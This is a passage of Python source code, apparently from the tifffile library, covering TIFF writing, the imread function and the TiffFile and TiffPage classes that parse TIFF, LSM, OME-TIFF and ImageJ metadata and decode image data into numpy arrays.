fh.seek(pos)
# write ifdentries
fh.write(pack(numtag_format, len(tags)))
tag_offset = fh.tell()
fh.write(b''.join(t[1] for t in tags))
self._ifd_offset = fh.tell()
fh.write(pack(offset_format, 0)) # offset to next IFD
# write tag values and patch offsets in ifdentries, if necessary
for tagindex, tag in enumerate(tags):
if tag[2]:
pos = fh.tell()
fh.seek(tag_offset + tagindex*tag_size + offset_size + 4)
fh.write(pack(offset_format, pos))
fh.seek(pos)
if tag[0] == tag_offsets:
strip_offsets_offset = pos
elif tag[0] == tag_byte_counts:
strip_byte_counts_offset = pos
fh.write(tag[2])
# write image data
data_offset = fh.tell()
if compress:
strip_byte_counts = []
for plane in data[pageindex]:
plane = zlib.compress(plane, compress)
strip_byte_counts.append(len(plane))
fh.write(plane)
else:
# if this fails try update Python/numpy
data[pageindex].tofile(fh)
fh.flush()
# update strip and tile offsets and byte_counts if necessary
pos = fh.tell()
for tagindex, tag in enumerate(tags):
if tag[0] == tag_offsets: # strip or tile offsets
if tag[2]:
fh.seek(strip_offsets_offset)
strip_offset = data_offset
for size in strip_byte_counts:
fh.write(pack(offset_format, strip_offset))
strip_offset += size
else:
fh.seek(tag_offset + tagindex*tag_size +
offset_size + 4)
fh.write(pack(offset_format, data_offset))
elif tag[0] == tag_byte_counts: # strip or tile byte_counts
if compress:
if tag[2]:
fh.seek(strip_byte_counts_offset)
for size in strip_byte_counts:
fh.write(pack(offset_format, size))
else:
fh.seek(tag_offset + tagindex*tag_size +
offset_size + 4)
fh.write(pack(offset_format, strip_byte_counts[0]))
break
fh.seek(pos)
fh.flush()
# remove tags that should be written only once
if pageindex == 0:
tags = [t for t in tags if not t[-1]]
def close(self):
self._fh.close()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
self.close()
def imread(files, **kwargs):
"""Return image data from TIFF file(s) as numpy array.
The first image series is returned if no arguments are provided.
Parameters
----------
files : str or list
File name, glob pattern, or list of file names.
key : int, slice, or sequence of page indices
Defines which pages to return as array.
series : int
Defines which series of pages in file to return as array.
multifile : bool
If True (default), OME-TIFF data may include pages from multiple files.
pattern : str
Regular expression pattern that matches axes names and indices in
file names.
kwargs : dict
Additional parameters passed to the TiffFile or TiffSequence asarray
function.
Examples
--------
>>> im = imread('temp.tif', key=0)
>>> im.shape
(3, 301, 219)
>>> ims = imread(['temp.tif', 'temp.tif'])
>>> ims.shape
(2, 10, 3, 301, 219)
"""
kwargs_file = {}
if 'multifile' in kwargs:
kwargs_file['multifile'] = kwargs['multifile']
del kwargs['multifile']
else:
kwargs_file['multifile'] = True
kwargs_seq = {}
if 'pattern' in kwargs:
kwargs_seq['pattern'] = kwargs['pattern']
del kwargs['pattern']
if isinstance(files, basestring) and any(i in files for i in '?*'):
files = glob.glob(files)
if not files:
raise ValueError('no files found')
if len(files) == 1:
files = files[0]
if isinstance(files, basestring):
with TiffFile(files, **kwargs_file) as tif:
return tif.asarray(**kwargs)
else:
with TiffSequence(files, **kwargs_seq) as imseq:
return imseq.asarray(**kwargs)
class lazyattr(object):
"""Lazy object attribute whose value is computed on first access."""
__slots__ = ('func', )
def __init__(self, func):
self.func = func
def __get__(self, instance, owner):
if instance is None:
return self
value = self.func(instance)
if value is NotImplemented:
return getattr(super(owner, instance), self.func.__name__)
setattr(instance, self.func.__name__, value)
return value
class TiffFile(object):
"""Read image and metadata from TIFF, STK, LSM, and FluoView files.
TiffFile instances must be closed using the close method, which is
automatically called when using the 'with' statement.
Attributes
----------
pages : list
All TIFF pages in file.
series : list of Records(shape, dtype, axes, TiffPages)
TIFF pages with compatible shapes and types.
micromanager_metadata: dict
Extra MicroManager non-TIFF metadata in the file, if exists.
All attributes are read-only.
Examples
--------
>>> with TiffFile('temp.tif') as tif:
... data = tif.asarray()
... data.shape
(5, 301, 219)
"""
def __init__(self, arg, name=None, offset=None, size=None,
multifile=True, multifile_close=True):
"""Initialize instance from file.
Parameters
----------
arg : str or open file
Name of file or open file object.
The file objects are closed in TiffFile.close().
name : str
Optional name of file in case 'arg' is a file handle.
offset : int
Optional start position of embedded file. By default this is
the current file position.
size : int
Optional size of embedded file. By default this is the number
of bytes from the 'offset' to the end of the file.
multifile : bool
If True (default), series may include pages from multiple files.
Currently applies to OME-TIFF only.
multifile_close : bool
If True (default), keep the handles of other files in multifile
series closed. This is inefficient when few files refer to
many pages. If False, the C runtime may run out of resources.
"""
self._fh = FileHandle(arg, name=name, offset=offset, size=size)
self.offset_size = None
self.pages = []
self._multifile = bool(multifile)
self._multifile_close = bool(multifile_close)
self._files = {self._fh.name: self} # cache of TiffFiles
try:
self._fromfile()
except Exception:
self._fh.close()
raise
@property
def filehandle(self):
"""Return file handle."""
return self._fh
@property
def filename(self):
"""Return name of file handle."""
return self._fh.name
def close(self):
"""Close open file handle(s)."""
for tif in self._files.values():
tif._fh.close()
self._files = {}
def _fromfile(self):
"""Read TIFF header and all page records from file."""
self._fh.seek(0)
try:
self.byteorder = {b'II': '<', b'MM': '>'}[self._fh.read(2)]
except KeyError:
raise ValueError("not a valid TIFF file")
version = struct.unpack(self.byteorder+'H', self._fh.read(2))[0]
if version == 43: # BigTiff
self.offset_size, zero = struct.unpack(self.byteorder+'HH',
self._fh.read(4))
if zero or self.offset_size != 8:
raise ValueError("not a valid BigTIFF file")
elif version == 42:
self.offset_size = 4
else:
raise ValueError("not a TIFF file")
self.pages = []
while True:
try:
page = TiffPage(self)
self.pages.append(page)
except StopIteration:
break
if not self.pages:
raise ValueError("empty TIFF file")
if self.is_micromanager:
# MicroManager files contain metadata not stored in TIFF tags.
self.micromanager_metadata = read_micromanager_metadata(self._fh)
if self.is_lsm:
self._fix_lsm_strip_offsets()
self._fix_lsm_strip_byte_counts()
def _fix_lsm_strip_offsets(self):
"""Unwrap strip offsets for LSM files greater than 4 GB."""
for series in self.series:
wrap = 0
previous_offset = 0
for page in series.pages:
strip_offsets = []
for current_offset in page.strip_offsets:
if current_offset < previous_offset:
wrap += 2**32
strip_offsets.append(current_offset + wrap)
previous_offset = current_offset
page.strip_offsets = tuple(strip_offsets)
def _fix_lsm_strip_byte_counts(self):
"""Set strip_byte_counts to size of compressed data.
The strip_byte_counts tag in LSM files contains the number of bytes
for the uncompressed data.
"""
if not self.pages:
return
strips = {}
for page in self.pages:
assert len(page.strip_offsets) == len(page.strip_byte_counts)
for offset, bytecount in zip(page.strip_offsets,
page.strip_byte_counts):
strips[offset] = bytecount
offsets = sorted(strips.keys())
offsets.append(min(offsets[-1] + strips[offsets[-1]], self._fh.size))
for i, offset in enumerate(offsets[:-1]):
strips[offset] = min(strips[offset], offsets[i+1] - offset)
for page in self.pages:
if page.compression:
page.strip_byte_counts = tuple(
strips[offset] for offset in page.strip_offsets)
@lazyattr
def series(self):
"""Return series of TiffPage with compatible shape and properties."""
if not self.pages:
return []
series = []
page0 = self.pages[0]
if self.is_ome:
series = self._omeseries()
elif self.is_fluoview:
dims = {b'X': 'X', b'Y': 'Y', b'Z': 'Z', b'T': 'T',
b'WAVELENGTH': 'C', b'TIME': 'T', b'XY': 'R',
b'EVENT': 'V', b'EXPOSURE': 'L'}
mmhd = list(reversed(page0.mm_header.dimensions))
series = [Record(
axes=''.join(dims.get(i[0].strip().upper(), 'Q')
for i in mmhd if i[1] > 1),
shape=tuple(int(i[1]) for i in mmhd if i[1] > 1),
pages=self.pages, dtype=numpy.dtype(page0.dtype))]
elif self.is_lsm:
lsmi = page0.cz_lsm_info
axes = CZ_SCAN_TYPES[lsmi.scan_type]
if page0.is_rgb:
axes = axes.replace('C', '').replace('XY', 'XYC')
axes = axes[::-1]
shape = tuple(getattr(lsmi, CZ_DIMENSIONS[i]) for i in axes)
pages = [p for p in self.pages if not p.is_reduced]
series = [Record(axes=axes, shape=shape, pages=pages,
dtype=numpy.dtype(pages[0].dtype))]
if len(pages) != len(self.pages): # reduced RGB pages
pages = [p for p in self.pages if p.is_reduced]
cp = 1
i = 0
while cp < len(pages) and i < len(shape)-2:
cp *= shape[i]
i += 1
shape = shape[:i] + pages[0].shape
axes = axes[:i] + 'CYX'
series.append(Record(axes=axes, shape=shape, pages=pages,
dtype=numpy.dtype(pages[0].dtype)))
elif self.is_imagej:
shape = []
axes = []
ij = page0.imagej_tags
if 'frames' in ij:
shape.append(ij['frames'])
axes.append('T')
if 'slices' in ij:
shape.append(ij['slices'])
axes.append('Z')
if 'channels' in ij and not self.is_rgb:
shape.append(ij['channels'])
axes.append('C')
remain = len(self.pages) // (product(shape) if shape else 1)
if remain > 1:
shape.append(remain)
axes.append('I')
shape.extend(page0.shape)
axes.extend(page0.axes)
axes = ''.join(axes)
series = [Record(pages=self.pages, shape=tuple(shape), axes=axes,
dtype=numpy.dtype(page0.dtype))]
elif self.is_nih:
if len(self.pages) == 1:
shape = page0.shape
axes = page0.axes
else:
shape = (len(self.pages),) + page0.shape
axes = 'I' + page0.axes
series = [Record(pages=self.pages, shape=shape, axes=axes,
dtype=numpy.dtype(page0.dtype))]
elif page0.is_shaped:
# TODO: shaped files can contain multiple series
shape = page0.tags['image_description'].value[7:-1]
shape = tuple(int(i) for i in shape.split(b','))
series = [Record(pages=self.pages, shape=shape,
axes='Q' * len(shape),
dtype=numpy.dtype(page0.dtype))]
# generic detection of series
if not series:
shapes = []
pages = {}
for page in self.pages:
if not page.shape:
continue
shape = page.shape + (page.axes,
page.compression in TIFF_DECOMPESSORS)
if shape not in pages:
shapes.append(shape)
pages[shape] = [page]
else:
pages[shape].append(page)
series = [Record(pages=pages[s],
axes=(('I' + s[-2])
if len(pages[s]) > 1 else s[-2]),
dtype=numpy.dtype(pages[s][0].dtype),
shape=((len(pages[s]), ) + s[:-2]
if len(pages[s]) > 1 else s[:-2]))
for s in shapes]
# remove empty series, e.g. in MD Gel files
series = [s for s in series if sum(s.shape) > 0]
return series
def asarray(self, key=None, series=None, memmap=False):
"""Return image data from multiple TIFF pages as numpy array.
By default the first image series is returned.
Parameters
----------
key : int, slice, or sequence of page indices
Defines which pages to return as array.
series : int
Defines which series of pages to return as array.
memmap : bool
If True, return an array stored in a binary file on disk
if possible.
"""
if key is None and series is None:
series = 0
if series is not None:
pages = self.series[series].pages
else:
pages = self.pages
if key is None:
pass
elif isinstance(key, int):
pages = [pages[key]]
elif isinstance(key, slice):
pages = pages[key]
elif isinstance(key, collections.Iterable):
pages = [pages[k] for k in key]
else:
raise TypeError("key must be an int, slice, or sequence")
if not len(pages):
raise ValueError("no pages selected")
if self.is_nih:
if pages[0].is_palette:
result = stack_pages(pages, colormapped=False, squeeze=False)
result = numpy.take(pages[0].color_map, result, axis=1)
result = numpy.swapaxes(result, 0, 1)
else:
result = stack_pages(pages, memmap=memmap,
colormapped=False, squeeze=False)
elif len(pages) == 1:
return pages[0].asarray(memmap=memmap)
elif self.is_ome:
assert not self.is_palette, "color mapping disabled for ome-tiff"
if any(p is None for p in pages):
# zero out missing pages
firstpage = next(p for p in pages if p)
nopage = numpy.zeros_like(
firstpage.asarray(memmap=False))
s = self.series[series]
if memmap:
with tempfile.NamedTemporaryFile() as fh:
result = numpy.memmap(fh, dtype=s.dtype, shape=s.shape)
result = result.reshape(-1)
else:
result = numpy.empty(s.shape, s.dtype).reshape(-1)
index = 0
class KeepOpen:
# keep Tiff files open between consecutive pages
def __init__(self, parent, close):
self.master = parent
self.parent = parent
self._close = close
def open(self, page):
if self._close and page and page.parent != self.parent:
if self.parent != self.master:
self.parent.filehandle.close()
self.parent = page.parent
self.parent.filehandle.open()
def close(self):
if self._close and self.parent != self.master:
self.parent.filehandle.close()
keep = KeepOpen(self, self._multifile_close)
for page in pages:
keep.open(page)
if page:
a = page.asarray(memmap=False, colormapped=False,
reopen=False)
else:
a = nopage
try:
result[index:index + a.size] = a.reshape(-1)
except ValueError as e:
warnings.warn("ome-tiff: %s" % e)
break
index += a.size
keep.close()
else:
result = stack_pages(pages, memmap=memmap)
if key is None:
try:
result.shape = self.series[series].shape
except ValueError:
try:
warnings.warn("failed to reshape %s to %s" % (
result.shape, self.series[series].shape))
# try series of expected shapes
result.shape = (-1,) + self.series[series].shape
except ValueError:
# revert to generic shape
result.shape = (-1,) + pages[0].shape
else:
result.shape = (-1,) + pages[0].shape
return result
def _omeseries(self):
"""Return image series in OME-TIFF file(s)."""
root = etree.fromstring(self.pages[0].tags['image_description'].value)
uuid = root.attrib.get('UUID', None)
self._files = {uuid: self}
dirname = self._fh.dirname
modulo = {}
result = []
for element in root:
if element.tag.endswith('BinaryOnly'):
warnings.warn("ome-xml: not an ome-tiff master file")
break
if element.tag.endswith('StructuredAnnotations'):
for annot in element:
if not annot.attrib.get('Namespace',
'').endswith('modulo'):
continue
for value in annot:
for modul in value:
for along in modul:
if not along.tag[:-1].endswith('Along'):
continue
axis = along.tag[-1]
newaxis = along.attrib.get('Type', 'other')
newaxis = AXES_LABELS[newaxis]
if 'Start' in along.attrib:
labels = range(
int(along.attrib['Start']),
int(along.attrib['End']) + 1,
int(along.attrib.get('Step', 1)))
else:
labels = [label.text for label in along
if label.tag.endswith('Label')]
modulo[axis] = (newaxis, labels)
if not element.tag.endswith('Image'):
continue
for pixels in element:
if not pixels.tag.endswith('Pixels'):
continue
atr = pixels.attrib
dtype = atr.get('Type', None)
axes = ''.join(reversed(atr['DimensionOrder']))
shape = list(int(atr['Size'+ax]) for ax in axes)
size = product(shape[:-2])
ifds = [None] * size
for data in pixels:
if not data.tag.endswith('TiffData'):
continue
atr = data.attrib
ifd = int(atr.get('IFD', 0))
num = int(atr.get('NumPlanes', 1 if 'IFD' in atr else 0))
num = int(atr.get('PlaneCount', num))
idx = [int(atr.get('First'+ax, 0)) for ax in axes[:-2]]
try:
idx = numpy.ravel_multi_index(idx, shape[:-2])
except ValueError:
# ImageJ produces invalid ome-xml when cropping
warnings.warn("ome-xml: invalid TiffData index")
continue
for uuid in data:
if not uuid.tag.endswith('UUID'):
continue
if uuid.text not in self._files:
if not self._multifile:
# abort reading multifile OME series
# and fall back to generic series
return []
fname = uuid.attrib['FileName']
try:
tif = TiffFile(os.path.join(dirname, fname))
except (IOError, ValueError):
tif.close()
warnings.warn(
"ome-xml: failed to read '%s'" % fname)
break
self._files[uuid.text] = tif
if self._multifile_close:
tif.close()
pages = self._files[uuid.text].pages
try:
for i in range(num if num else len(pages)):
ifds[idx + i] = pages[ifd + i]
except IndexError:
warnings.warn("ome-xml: index out of range")
# only process first uuid
break
else:
pages = self.pages
try:
for i in range(num if num else len(pages)):
ifds[idx + i] = pages[ifd + i]
except IndexError:
warnings.warn("ome-xml: index out of range")
if all(i is None for i in ifds):
# skip images without data
continue
dtype = next(i for i in ifds if i).dtype
result.append(Record(axes=axes, shape=shape, pages=ifds,
dtype=numpy.dtype(dtype)))
for record in result:
for axis, (newaxis, labels) in modulo.items():
i = record.axes.index(axis)
size = len(labels)
if record.shape[i] == size:
record.axes = record.axes.replace(axis, newaxis, 1)
else:
record.shape[i] //= size
record.shape.insert(i+1, size)
record.axes = record.axes.replace(axis, axis+newaxis, 1)
record.shape = tuple(record.shape)
# squeeze dimensions
for record in result:
record.shape, record.axes = squeeze_axes(record.shape, record.axes)
return result
def __len__(self):
"""Return number of image pages in file."""
return len(self.pages)
def __getitem__(self, key):
"""Return specified page."""
return self.pages[key]
def __iter__(self):
"""Return iterator over pages."""
return iter(self.pages)
def __str__(self):
"""Return string containing information about file."""
result = [
self._fh.name.capitalize(),
format_size(self._fh.size),
{'<': 'little endian', '>': 'big endian'}[self.byteorder]]
if self.is_bigtiff:
result.append("bigtiff")
if len(self.pages) > 1:
result.append("%i pages" % len(self.pages))
if len(self.series) > 1:
result.append("%i series" % len(self.series))
if len(self._files) > 1:
result.append("%i files" % (len(self._files)))
return ", ".join(result)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
self.close()
@lazyattr
def fstat(self):
try:
return os.fstat(self._fh.fileno())
except Exception: # io.UnsupportedOperation
return None
@lazyattr
def is_bigtiff(self):
return self.offset_size != 4
@lazyattr
def is_rgb(self):
return all(p.is_rgb for p in self.pages)
@lazyattr
def is_palette(self):
return all(p.is_palette for p in self.pages)
@lazyattr
def is_mdgel(self):
return any(p.is_mdgel for p in self.pages)
@lazyattr
def is_mediacy(self):
return any(p.is_mediacy for p in self.pages)
@lazyattr
def is_stk(self):
return all(p.is_stk for p in self.pages)
@lazyattr
def is_lsm(self):
return self.pages[0].is_lsm
@lazyattr
def is_imagej(self):
return self.pages[0].is_imagej
@lazyattr
def is_micromanager(self):
return self.pages[0].is_micromanager
@lazyattr
def is_nih(self):
return self.pages[0].is_nih
@lazyattr
def is_fluoview(self):
return self.pages[0].is_fluoview
@lazyattr
def is_ome(self):
return self.pages[0].is_ome
class TiffPage(object):
"""A TIFF image file directory (IFD).
Attributes
----------
index : int
Index of page in file.
dtype : str {TIFF_SAMPLE_DTYPES}
Data type of image, colormapped if applicable.
shape : tuple
Dimensions of the image array in TIFF page,
colormapped and with one alpha channel if applicable.
axes : str
Axes label codes:
'X' width, 'Y' height, 'S' sample, 'I' image series|page|plane,
'Z' depth, 'C' color|em-wavelength|channel, 'E' ex-wavelength|lambda,
'T' time, 'R' region|tile, 'A' angle, 'P' phase, 'H' lifetime,
'L' exposure, 'V' event, 'Q' unknown, '_' missing
tags : TiffTags
Dictionary of tags in page.
Tag values are also directly accessible as attributes.
color_map : numpy array
Color look up table, if exists.
cz_lsm_scan_info: Record(dict)
LSM scan info attributes, if exists.
imagej_tags: Record(dict)
Consolidated ImageJ description and metadata tags, if exists.
uic_tags: Record(dict)
Consolidated MetaMorph STK/UIC tags, if exists.
All attributes are read-only.
Notes
-----
The internal, normalized '_shape' attribute is 6 dimensional:
0. number planes (stk)
1. planar samples_per_pixel
2. image_depth Z (sgi)
3. image_length Y
4. image_width X
5. contig samples_per_pixel
"""
def __init__(self, parent):
"""Initialize instance from file."""
self.parent = parent
self.index = len(parent.pages)
self.shape = self._shape = ()
self.dtype = self._dtype = None
self.axes = ""
self.tags = TiffTags()
self._fromfile()
self._process_tags()
def _fromfile(self):
"""Read TIFF IFD structure and its tags from file.
File cursor must be at storage position of IFD offset and is left at
offset to next IFD.
Raises StopIteration if offset (first bytes read) is 0.
"""
fh = self.parent.filehandle
byteorder = self.parent.byteorder
offset_size = self.parent.offset_size
fmt = {4: 'I', 8: 'Q'}[offset_size]
offset = struct.unpack(byteorder + fmt, fh.read(offset_size))[0]
if not offset:
raise StopIteration()
# read standard tags
tags = self.tags
fh.seek(offset)
fmt, size = {4: ('H', 2), 8: ('Q', 8)}[offset_size]
try:
numtags = struct.unpack(byteorder + fmt, fh.read(size))[0]
except Exception:
warnings.warn("corrupted page list")
raise StopIteration()
tagcode = 0
for _ in range(numtags):
try:
tag = TiffTag(self.parent)
# print(tag)
except TiffTag.Error as e:
warnings.warn(str(e))
continue
if tagcode > tag.code:
# expected for early LSM and tifffile versions
warnings.warn("tags are not ordered by code")
tagcode = tag.code
if tag.name not in tags:
tags[tag.name] = tag
else:
# some files contain multiple IFD with same code
# e.g. MicroManager files contain two image_description
i = 1
while True:
name = "%s_%i" % (tag.name, i)
if name not in tags:
tags[name] = tag
break
pos = fh.tell()
if self.is_lsm or (self.index and self.parent.is_lsm):
# correct non standard LSM bitspersample tags
self.tags['bits_per_sample']._correct_lsm_bitspersample(self)
if self.is_lsm:
# read LSM info subrecords
for name, reader in CZ_LSM_INFO_READERS.items():
try:
offset = self.cz_lsm_info['offset_'+name]
except KeyError:
continue
if offset < 8:
# older LSM revision
continue
fh.seek(offset)
try:
setattr(self, 'cz_lsm_'+name, reader(fh))
except ValueError:
pass
elif self.is_stk and 'uic1tag' in tags and not tags['uic1tag'].value:
# read uic1tag now that plane count is known
uic1tag = tags['uic1tag']
fh.seek(uic1tag.value_offset)
tags['uic1tag'].value = Record(
read_uic1tag(fh, byteorder, uic1tag.dtype, uic1tag.count,
tags['uic2tag'].count))
fh.seek(pos)
def _process_tags(self):
"""Validate standard tags and initialize attributes.
Raise ValueError if tag values are not supported.
"""
tags = self.tags
for code, (name, default, dtype, count, validate) in TIFF_TAGS.items():
if not (name in tags or default is None):
tags[name] = TiffTag(code, dtype=dtype, count=count,
value=default, name=name)
if name in tags and validate:
try:
if tags[name].count == 1:
setattr(self, name, validate[tags[name].value])
else:
setattr(self, name, tuple(
validate[value] for value in tags[name].value))
except KeyError:
raise ValueError("%s.value (%s) not supported" %
(name, tags[name].value))
tag = tags['bits_per_sample']
if tag.count == 1:
self.bits_per_sample = tag.value
else:
# LSM might list more items than samples_per_pixel
value = tag.value[:self.samples_per_pixel]
if any((v-value[0] for v in value)):
self.bits_per_sample = value
else:
self.bits_per_sample = value[0]
tag = tags['sample_format']
if tag.count == 1:
self.sample_format = TIFF_SAMPLE_FORMATS[tag.value]
else:
value = tag.value[:self.samples_per_pixel]
if any((v-value[0] for v in value)):
self.sample_format = [TIFF_SAMPLE_FORMATS[v] for v in value]
else:
self.sample_format = TIFF_SAMPLE_FORMATS[value[0]]
if 'photometric' not in tags:
self.photometric = None
if 'image_depth' not in tags:
self.image_depth = 1
if 'image_length' in tags:
self.strips_per_image = int(math.floor(
float(self.image_length + self.rows_per_strip - 1) /
self.rows_per_strip))
else:
self.strips_per_image = 0
key = (self.sample_format, self.bits_per_sample)
self.dtype = self._dtype = TIFF_SAMPLE_DTYPES.get(key, None)
if 'image_length' not in self.tags or 'image_width' not in self.tags:
# some GEL file pages are missing image data
self.image_length = 0
self.image_width = 0
self.image_depth = 0
self.strip_offsets = 0
self._shape = ()
self.shape = ()
self.axes = ''
if self.is_palette:
self.dtype = self.tags['color_map'].dtype[1]
self.color_map = numpy.array(self.color_map, self.dtype)
dmax = self.color_map.max()
if dmax < 256:
self.dtype = numpy.uint8
self.color_map = self.color_map.astype(self.dtype)
#else:
# self.dtype = numpy.uint8
# self.color_map >>= 8
# self.color_map = self.color_map.astype(self.dtype)
self.color_map.shape = (3, -1)
# determine shape of data
image_length = self.image_length
image_width = self.image_width
image_depth = self.image_depth
samples_per_pixel = self.samples_per_pixel
if self.is_stk:
assert self.image_depth == 1
planes = self.tags['uic2tag'].count
if self.is_contig:
self._shape = (planes, 1, 1, image_length, image_width,
samples_per_pixel)
if samples_per_pixel == 1:
self.shape = (planes, image_length, image_width)
self.axes = 'YX'
else:
self.shape = (planes, image_length, image_width,
samples_per_pixel)
self.axes = 'YXS'
else:
self._shape = (planes, samples_per_pixel, 1, image_length,
image_width, 1)
if samples_per_pixel == 1:
self.shape = (planes, image_length, image_width)
self.axes = 'YX'
else:
self.shape = (planes, samples_per_pixel, image_length,
image_width)
self.axes = 'SYX'
# detect type of series
if planes == 1:
self.shape = self.shape[1:]
elif numpy.all(self.uic2tag.z_distance != 0):
self.axes = 'Z' + self.axes
elif numpy.all(numpy.diff(self.uic2tag.time_created) != 0):
self.axes = 'T' + self.axes
else:
self.axes = 'I' + self.axes
# DISABLED
if self.is_palette:
assert False, "color mapping disabled for stk"
if self.color_map.shape[1] >= 2**self.bits_per_sample:
if image_depth == 1:
self.shape = (3, planes, image_length, image_width)
else:
self.shape = (3, planes, image_depth, image_length,
image_width)
self.axes = 'C' + self.axes
else:
warnings.warn("palette cannot be applied")
self.is_palette = False
elif self.is_palette:
samples = 1
if 'extra_samples' in self.tags:
samples += len(self.extra_samples)
if self.is_contig:
self._shape = (1, 1, image_depth, image_length, image_width,
samples)
else:
self._shape = (1, samples, image_depth, image_length,
image_width, 1)
if self.color_map.shape[1] >= 2**self.bits_per_sample:
if image_depth == 1:
self.shape = (3, image_length, image_width)
self.axes = 'CYX'
else:
self.shape = (3, image_depth, image_length, image_width)
self.axes = 'CZYX'
else:
warnings.warn("palette cannot be applied")
self.is_palette = False
if image_depth == 1:
self.shape = (image_length, image_width)
self.axes = 'YX'
else:
self.shape = (image_depth, image_length, image_width)
self.axes = 'ZYX'
elif self.is_rgb or samples_per_pixel > 1:
if self.is_contig:
self._shape = (1, 1, image_depth, image_length, image_width,
samples_per_pixel)
if image_depth == 1:
self.shape = (image_length, image_width, samples_per_pixel)
self.axes = 'YXS'
else:
self.shape = (image_depth, image_length, image_width,
samples_per_pixel)
self.axes = 'ZYXS'
else:
self._shape = (1, samples_per_pixel, image_depth,
image_length, image_width, 1)
if image_depth == 1:
self.shape = (samples_per_pixel, image_length, image_width)
self.axes = 'SYX'
else:
self.shape = (samples_per_pixel, image_depth,
image_length, image_width)
self.axes = 'SZYX'
if False and self.is_rgb and 'extra_samples' in self.tags:
# DISABLED: only use RGB and first alpha channel if exists
extra_samples = self.extra_samples
if self.tags['extra_samples'].count == 1:
extra_samples = (extra_samples, )
for exs in extra_samples:
if exs in ('unassalpha', 'assocalpha', 'unspecified'):
if self.is_contig:
self.shape = self.shape[:-1] + (4,)
else:
self.shape = (4,) + self.shape[1:]
break
else:
self._shape = (1, 1, image_depth, image_length, image_width, 1)
if image_depth == 1:
self.shape = (image_length, image_width)
self.axes = 'YX'
else:
self.shape = (image_depth, image_length, image_width)
self.axes = 'ZYX'
if not self.compression and 'strip_byte_counts' not in tags:
self.strip_byte_counts = (
product(self.shape) * (self.bits_per_sample // 8), )
assert len(self.shape) == len(self.axes)
def asarray(self, squeeze=True, colormapped=True, rgbonly=False,
scale_mdgel=False, memmap=False, reopen=True):
"""Read image data from file and return as numpy array.
Raise ValueError if format is unsupported.
If any of 'squeeze', 'colormapped', or 'rgbonly' are not the default,
the shape of the returned array might be different from the page shape.
Parameters
----------
squeeze : bool
If True, all length-1 dimensions (except X and Y) are
squeezed out from result.
colormapped : bool
If True, color mapping is applied for palette-indexed images.
rgbonly : bool
If True, return RGB(A) image without additional extra samples.
memmap : bool
If True, use numpy.memmap to read arrays from file if possible.
For use on 64 bit systems and files with few huge contiguous data.
reopen : bool
If True and the parent file handle is closed, the file is
temporarily re-opened (and closed if no exception occurs).
scale_mdgel : bool
If True, MD Gel data will be scaled according to the private
metadata in the second TIFF page. The dtype will be float32.
"""
if not self._shape:
return
if self.dtype is None:
raise ValueError("data type not supported: %s%i" % (
self.sample_format, self.bits_per_sample))
if self.compression not in TIFF_DECOMPESSORS:
raise ValueError("cannot decompress %s" % self.compression)
tag = self.tags['sample_format']
if tag.count != 1 and any((i-tag.value[0] for i in tag.value)):
raise ValueError("sample formats don't match %s" % str(tag.value))
fh = self.parent.filehandle
closed = fh.closed
if closed:
if reopen:
fh.open()
else:
raise IOError("file handle is closed")
dtype = self._dtype
shape = self._shape
image_width = self.image_width
image_length = self.image_length
image_depth = self.image_depth
typecode = self.parent.byteorder + dtype
bits_per_sample = self.bits_per_sample
if self.is_tiled:
if 'tile_offsets' in self.tags:
byte_counts = self.tile_byte_counts
offsets = self.tile_offsets
else:
byte_counts = self.strip_byte_counts
offsets = self.strip_offsets
tile_width = self.tile_width
tile_length = self.tile_length
tile_depth = self.tile_depth if 'tile_depth' in self.tags else 1
tw = (image_width + tile_width - 1) // tile_width
tl = (image_length + tile_length - 1) // tile_length
td = (image_depth + tile_depth - 1) // tile_depth
shape = (shape[0], shape[1],
td*tile_depth, tl*tile_length, tw*tile_width, shape[-1])
tile_shape = (tile_depth, tile_length, tile_width, shape[-1])
runlen = tile_width
else:
byte_counts = self.strip_byte_counts
offsets = self.strip_offsets
runlen = image_width
if any(o < 2 for o in offsets):
raise ValueError("corrupted page")
if memmap and self._is_memmappable(rgbonly, colormapped):
result = fh.memmap_array(typecode, shape, offset=offsets[0])
elif self.is_contiguous:
fh.seek(offsets[0])
result = fh.read_array(typecode, product(shape))
result = result.astype('=' + dtype)
else:
if self.is_contig:
runlen *= self.samples_per_pixel
if bits_per_sample in (8, 16, 32, 64, 128):
if (bits_per_sample * runlen) % 8:
raise ValueError("data and sample size mismatch")
def unpack(x):
try:
return numpy.fromstring(x, typecode)
except ValueError as e:
# strips may be missing EOI
warnings.warn("unpack: %s" % e)
xlen = ((len(x) // (bits_per_sample // 8))
* (bits_per_sample // 8))
return numpy.fromstring(x[:xlen], typecode)
elif isinstance(bits_per_sample, tuple):
def unpack(x):
return unpackrgb(x, typecode, bits_per_sample)
else:
def unpack(x):
return unpackints(x, typecode, bits_per_sample, runlen)
decompress = TIFF_DECOMPESSORS[self.compression]
if self.compression == 'jpeg':
table = self.jpeg_tables if 'jpeg_tables' in self.tags else b''
decompress = lambda x: decodejpg(x, table, self.photometric)
if self.is_tiled:
result = numpy.empty(shape, dtype)
tw, tl, td, pl = 0, 0, 0, 0
for offset, bytecount in zip(offsets, byte_counts):
fh.seek(offset)
tile = unpack(decompress(fh.read(bytecount)))
tile.shape = tile_shape
if self.predictor == 'horizontal':
numpy.cumsum(tile, axis=-2, dtype=dtype, out=tile)
result[0, pl, td:td+tile_depth,
tl:tl+tile_length, tw:tw+tile_width, :] = tile
del tile
tw += tile_width
if tw >= shape[4]:
tw, tl = 0, tl + tile_length
if tl >= shape[3]:
tl, td = 0, td + tile_depth
if td >= shape[2]:
td, pl = 0, pl + 1
result = result[...,
:image_depth, :image_length, :image_width, :]
else:
strip_size = (self.rows_per_strip * self.image_width *
self.samples_per_pixel)
result = numpy.empty(shape, dtype).reshape(-1)
index = 0
for offset, bytecount in zip(offsets, byte_counts):
fh.seek(offset)
strip = fh.read(bytecount)
strip = decompress(strip)
strip = unpack(strip)
size = min(result.size, strip.size, strip_size,
result.size - index)
result[index:index+size] = strip[:size]
del strip
index += size
result.shape = self._shape
if self.predictor == 'horizontal' and not (self.is_tiled and not
self.is_contiguous):
# work around bug in LSM510 software
if not (self.parent.is_lsm and not self.compression):
numpy.cumsum(result, axis=-2, dtype=dtype, out=result)
if colormapped and self.is_palette:
if self.color_map.shape[1] >= 2**bits_per_sample:
# FluoView and LSM might fail here
result = numpy.take(self.color_map,
result[:, 0, :, :, :, 0], axis=1)
